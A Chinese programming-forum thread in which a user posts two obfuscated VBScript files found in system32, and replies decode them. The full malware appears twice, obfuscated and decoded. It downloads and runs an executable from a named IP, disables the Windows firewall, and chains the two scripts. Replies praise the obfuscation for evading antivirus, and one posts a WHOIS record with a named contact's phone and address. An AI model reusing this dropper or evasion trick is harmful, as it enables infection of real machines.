电脑上抓到两个可疑脚本,手头没VB,懒得手工翻译,贴代码给大家看看
在system32文件夹下:
文件1:run.vbs
内容:
set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
xPost.Send()
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
wscript.sleep Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48)
oshell.run Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)
文件2: run2.vbs
内容:
set shell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
shell.run Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
shell.run Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)
由于不是直接含敏感代码,故而杀毒软件无视.
于是直接将系统的VBS文件打开方式从脚本解释器改成记事本了.
[解决办法]
。。。路过,节分
[解决办法]
[解决办法]
?Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108)Wscript.shell?Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80)Microsoft.XMLHTTP?Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)GET http://218.11.0.167:8080/1.exe 0?Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109)ADODB.Stream?Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)oky.exe 2?Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48)10000?Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)oky.exe?Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108)Wscript.shell?Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)net stop sharedaccess 0?Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)%windir%\run.vbs 0
[解决办法]
run1.vbs
set oshell = wscript.createobject (Wscript.shell)
Set xPost = CreateObject(Microsoft.XMLHTTP)
xPost.Open GET,http://218.11.0.167:8080/1.exe,0
xPost.Send()
Set sGet = CreateObject(ADODB.Stream)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile oky.exe,2
wscript.sleep 10000
oshell.run oky.exe
run2.vbs
set shell = wscript.createobject (Wscript.shell)
shell.run net stop sharedaccess,0
shell.run %windir%\run.vbs,0
[解决办法]
Using 30+ day old [STALE - being deleted now] cached answer (or, you can get fresh results).
Hiding E-mail address (you can get results with the E-mail address).
% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 218.11.0.0 - 218.12.255.255
netname: UNICOM-HE
country: CN
descr: China Unicom Hebei province network
descr: China Unicom
admin-c: CH1302-AP
tech-c: KL984-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-CNCGROUP-HE
mnt-routes: MAINT-CNCGROUP-RR
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: *****@cnc-noc.net 20031217
changed: **********@apnic.net 20080314
changed: **********@apnic.net 20090508
source: APNIC
route: 218.11.0.0/16
descr: CNC Group CHINA169 Hebei Province Network
country: CN
origin: AS4837
mnt-by: MAINT-CNCGROUP-RR
changed: *****@cnc-noc.net 20060118
source: APNIC
person: ChinaUnicom Hostmaster
nic-hdl: CH1302-AP
e-mail: *****@chinaunicom.cn
address: No.21,Jin-Rong Street
address: Beijing,100140
address: P.R.China
phone: +86-10-66259940
fax-no: +86-10-66259764
country: CN
changed: *****@chinaunicom.cn 20090408
mnt-by: MAINT-CNCGROUP
source: APNIC
person: Kong Lingfei
nic-hdl: KL984-AP
e-mail: *******@chinaunicom.cn
address: 45, Guang An Street, Shi Jiazhuang City, HeBei Province,050011,CN
phone: +86-311-86681601
fax-no: +86-311-86689210
country: cn
changed: *******@chinaunicom.cn 20090206
mnt-by: MAINT-CNCGROUP-HE
source: APNIC
[解决办法]
[解决办法]
[解决办法]
http://www.baidu.com/s?bs=%BF%D7%C1%EE%B7%C9&f=8&wd=0311-86681601&n=2&inputT=2110
[解决办法]
好好学习脚本??
[解决办法]
疯狂的脚本。。。。。。。。。。。。。。。。。。。。。。。。。。
[解决办法]
楼主的杀毒不给力
我用Avast!打开这个页面就报警
复制楼主的内容,保存到文件也被干掉
[解决办法]
我电脑用的微软的杀毒软件,保存哪段代码,也是有提示的!
[解决办法]
顶起来看看,找得到不?
[解决办法]
MSE在保存上面这段代码时也提示有毒。。。
[解决办法]
这样写可以过360,赞一个,学习了。
------解决方案--------------------
路过看看
[解决办法]
高手总是有的,
[解决办法]
nod32第一段扫出来了,第二段没反应
[解决办法]
看看热闹……